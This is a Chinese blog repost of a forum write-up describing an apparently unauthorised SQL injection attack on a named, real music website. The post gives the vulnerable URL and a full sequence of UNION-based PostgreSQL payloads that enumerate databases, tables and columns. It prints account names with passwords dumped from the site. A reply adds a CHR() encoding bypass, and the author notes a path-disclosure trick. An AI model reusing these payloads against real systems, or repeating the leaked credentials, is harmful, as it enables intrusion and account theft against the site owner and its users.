注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

一次无语的PostgreSQL注入  

2015-02-03 21:51:05|  分类: SQL injection |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本帖最后由 0x6dhanli 于 2012-4-12 17:58 编辑

目标站:
  1. http://www.yamahamusic.co.jp
复制代码

作者:0x6dhanli   

看到 postgetsql注入 忍不住自己去练练手 遇到个郁闷的注入

正题  注入点:
  1. www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=67
复制代码


判断注入 ' and 1=2 和判断数据库/* /*hack*/ 以及--
看是判断注入字段长度 直接给结果 字段长度19
  1. www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=67 order by 19-- 返回正常
复制代码


在这里 order by 19--在这必须要输入"--"注释 不输入返回是错误的 然而有些站不需要输入"--"也能判断
这个是什么原因  可能是闭合的问题 (猜测错了 大牛纠正下 O(∩_∩)O~ 本人小菜 )
使用联合查询

  1. www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=67+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 返回错误

  2. www.yamahamusic.co.jp/music.php?pgm_id=6555& prd_id=67+UNION+SELECT+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+-- 返回正确
复制代码



回显

  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,version(),3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+--
复制代码


原理看这里日本大学入侵系列3 东京大学之 - PostgreSQL注常见问题入总结
知道了回显位子和版本version

PostgreSQL 7.4.30 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 3.4.6 20060404 (Red Hat 3.4.6-11)

报数据current_database和用户user
  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,current_database(),3,user,5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+--

复制代码


结果 yamaha6  yamaha

开始暴库了
  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,datname,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+pg_database++limit+1+offset+0--

复制代码

改变offset 后面数字 可以得到所有数据库 capsule contemode haigo3 haigou homepage itosachiko postgres template0 template1 uchuunokodomo yamaha4 yamaha5 yamaha6 yamaha7 yamaha_pict yamaha_pict_system yamahamusic

但在这里 去掉 limit 1 offset 0
  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,datname,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+pg_database--

复制代码

直接能把所有的库列出来
其他的网站 我试试不能 网站的原因把

看是列表
  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,relname,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+pg_stat_user_tables+limit+1+offset+0--
复制代码



把offset 0 的0 变为1,2,3,4 等等吧可以和爆库一样 去点 limit 1 offset 0  得到所有的表

account artist clipupload helpmain helpsub link product program sql_features sql_implementation_info sql_languages sql_sizing sql_sizing_profiles sqlmapfile whatsnew

开始爆表account的字段了 郁闷的开始 ⊙﹏⊙b汗

  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,column_name,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+information_schema.columns+where+table_name=0x6163636F756E74--

复制代码

出错了 郁闷  不知道是什么原因 蛋疼的很 table_name这个函数 我确定 了是存在的  不晓得是啥原因 求大牛告诉我

但是


  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,column_name,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+information_schema.columns--

复制代码

这个能爆出所有的字段 ⊙﹏⊙b汗 无知道为什么原因 出错应该是 where table_name=table_name=0x6163636F756E74把
  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,column_name,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+information_schema.columns+where+1=1 --

复制代码
也能把字段全部爆出来 只有是table_name=0x6163636F756E74的原因  我把看到字段中友table_name的字段  ⊙﹏⊙b汗 不会是起冲突的原因把。哎 疼
用机器跑了一次 数据

account 的字段name  pass等
哎  把密码爆出把
  1. http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,name,3,version(),5,null,pass,8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+account+limit+1+offset+0--

复制代码


miyake1 miyake| miyake2 miyake |writer ymc55|ymceditor ymc66|ymcmaster ymc77|
注入就到这里把

顺便告诉一个小技巧  在弄php的网站  有时候用中文输入下的单引号‘ 加在php页面的后面能爆出路径  找了些商品站 我都爆出路径来了的 就是晓不得其他的行不行 呵呵

本帖最后由 michale 于 2012-4-12 18:52 编辑
Uing07 发表于 2012-4-12 18:01
很奇怪, 我参考了小白blog的相关内容, 换了显示位, 后面也加上了limit x offset o, 但是依旧出错...
晚上回 ...

坐等你妹啊 直接变换一下编码就ok了!禽兽为了防止07个MJJ的发出来答案 我先抢先一步
http://www.yamahamusic.co.jp/music.php?pgm_id=6555&prd_id=-67+union+select+1,column_name,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+information_schema.columns+where+table_name=CHR(97)||CHR(99)||CHR(99)||CHR(111)||CHR(117)||CHR(110)||CHR(116)--



表示没看懂
01.http://www.yamahamusic.co.jp/mus ... =-67+union+select+1,column_name,3,version(),5,null,version(),8,9,version(),null,version(),version(),version(),15,version(),version(),version(),version()+from+information_schema.columns+where+table_name=0x6163636F756E74--

这句我觉得应该加个limit !

  评论这张
 
阅读(49)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017